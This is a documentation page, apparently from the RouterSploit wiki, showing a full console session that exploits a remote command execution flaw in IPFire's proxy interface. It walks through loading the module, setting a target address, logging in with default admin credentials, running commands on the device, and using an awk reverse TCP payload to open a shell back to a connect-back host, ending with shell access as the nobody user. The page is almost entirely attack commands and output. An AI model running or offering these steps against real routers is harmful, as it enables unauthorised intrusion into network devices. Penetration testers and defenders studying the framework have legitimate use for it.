Exploiting Target

Marcin Bury edited this page Oct 14, 2018 · 3 revisions

Example Exploitation

rsf > use exploits/routers/ipfire/ipfire_proxy_rce
rsf (IPFire Proxy RCE) > set target 192.168.2.88
[+] target => 192.168.2.88
rsf (IPFire Proxy RCE) > show options

Target options:

   Name       Current settings     Description
   ----       ----------------     -----------
   ssl        true                 SSL enabled: true/false
   target     192.168.2.88         Target IPv4 or IPv6 address
   port       444                  Target HTTP port


Module options:

   Name          Current settings     Description
   ----          ----------------     -----------
   verbosity     true                 Verbosity enabled: true/false
   username      admin                Username to log in with
   password      admin                Password to log in with


rsf (IPFire Proxy RCE) > run
[*] Running module...
[+] Target is vulnerable
[*] Invoking command loop...

[+] Welcome to cmd. Commands are sent to the target via the execute method.
[*] For further exploitation use 'show payloads' and 'set payload <payload>' commands.

cmd > uname -a
[*] Executing 'uname -a' on the device...
Linux ipfire 3.10.44-ipfire #1 SMP Tue Sep 9 18:11:30 GMT 2014 i686 i686 i386 GNU/Linux

cmd > show payloads
[*] Available payloads:

   Payload             Name                Description
   -------             ----                -----------
   awk_bind_udp        Awk Bind UDP        Creates an interactive udp bind shell by using (g)awk.
   awk_bind_tcp        Awk Bind TCP        Creates an interactive tcp bind shell by using (g)awk.
   awk_reverse_tcp     Awk Reverse TCP     Creates an interactive tcp reverse shell by using (g)awk.

cmd > set payload awk_reverse_tcp
cmd (Awk Reverse TCP) > show options

Payload Options:

   Name        Current settings     Description
   ----        ----------------     -----------
   lhost                            Connect-back IP address
   lport       5555                 Connect-back TCP Port
   encoder                          Encoder
   cmd         awk                  Awk binary


cmd (Awk Reverse TCP) > set lhost 192.168.2.100
lhost => 192.168.2.100
cmd (Awk Reverse TCP) > run
[*] Executing payload on the device
[*] Waiting for reverse shell...
[*] Connection from 192.168.2.88:48775
[+] Enjoy your shell
id
uid=99(nobody) gid=99(nobody) groups=16(dialout),23(squid),99(nobody)